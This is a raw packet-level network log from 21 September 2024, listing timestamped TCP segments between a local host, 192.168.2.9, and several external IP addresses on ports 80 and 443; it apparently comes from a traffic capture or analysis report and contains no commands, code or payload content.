                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554405928 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554414034 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554420948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554426908 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554438114 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554441929 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554452896 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554457903 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554472923 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554498911 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554498911 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554837942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.554884911 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555059910 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555074930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555089951 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555098057 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555107117 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555109978 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555124998 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555135965 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555140972 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555146933 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555155993 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555166960 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555171967 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555176973 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555187941 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555197954 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555202961 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555218935 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555218935 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555227041 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555234909 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555248976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555249929 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555263042 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555267096 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555279016 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555283070 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555294991 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555301905 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555311918 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555320978 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555335999 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555360079 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555372953 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555918932 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555934906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555953026 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555968046 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555982113 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555988073 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555998087 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.555999994 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556015015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556018114 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556031942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556034088 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556049109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556051970 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556067944 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556248903 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556821108 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556845903 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556859970 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556875944 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556885004 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556885958 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556890011 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556905031 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556920052 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556929111 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556929111 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556935072 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556950092 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556963921 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556972027 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556972027 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556978941 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.556988001 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557003021 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557015896 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557015896 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557018995 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557034016 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557049990 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557058096 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557064056 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557073116 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557086945 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557089090 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557089090 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557097912 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557127953 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557127953 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557331085 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557746887 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557761908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557787895 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557792902 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557805061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557809114 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557821035 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557828903 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557832003 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557843924 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557846069 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557862997 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557863951 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557881117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557884932 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557898998 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557912111 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557912111 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557914019 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557933092 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557943106 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557946920 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557957888 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557964087 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557986021 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557986021 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.557991982 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558007956 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558007956 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558026075 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558031082 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558046103 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558048964 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558062077 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558068991 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558079004 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558089018 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558096886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558111906 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558125019 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.558166027 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559062004 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559084892 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559099913 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559107065 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559122086 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559137106 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559151888 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559168100 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559165955 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559165955 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559175968 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559184074 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559189081 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559199095 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559207916 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559222937 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559237957 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559252977 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559253931 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559253931 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559267998 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559283018 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559290886 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559290886 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559298038 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559312105 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559325933 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559336901 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559336901 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559446096 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559571981 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559587955 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559601068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559623957 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559638977 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559664011 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559668064 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559679985 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559691906 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559703112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559711933 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559720993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559731007 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559736967 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559743881 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559760094 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559775114 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559778929 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559791088 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559791088 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559792042 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559808016 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559822083 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559828043 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559828043 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559829950 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559838057 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559845924 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559859991 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559863091 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559863091 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559866905 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559885025 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559894085 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559936047 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.559936047 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561470032 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561487913 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561501980 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561517000 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561532021 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561557055 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561557055 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.561685085 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.563982010 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.563999891 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564013958 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564028025 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564044952 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564059019 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564060926 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564069033 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564083099 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564097881 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564105034 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564105034 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564112902 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564126968 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564141989 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564151049 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564151049 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564157963 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564193010 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.564193010 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565156937 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565354109 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565375090 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565435886 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565450907 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565465927 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565481901 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565498114 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565510988 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565510988 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565510988 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.565596104 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567562103 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567583084 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567596912 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567610979 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567626953 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567631960 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567631960 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567643881 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567652941 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567661047 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567667961 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567675114 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567675114 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567683935 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567713976 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567713976 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567857981 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.567879915 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568033934 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568085909 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568178892 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568614960 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568852901 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568869114 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568913937 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.568913937 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.570430040 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.570449114 CEST8049709147.45.44.104192.168.2.9
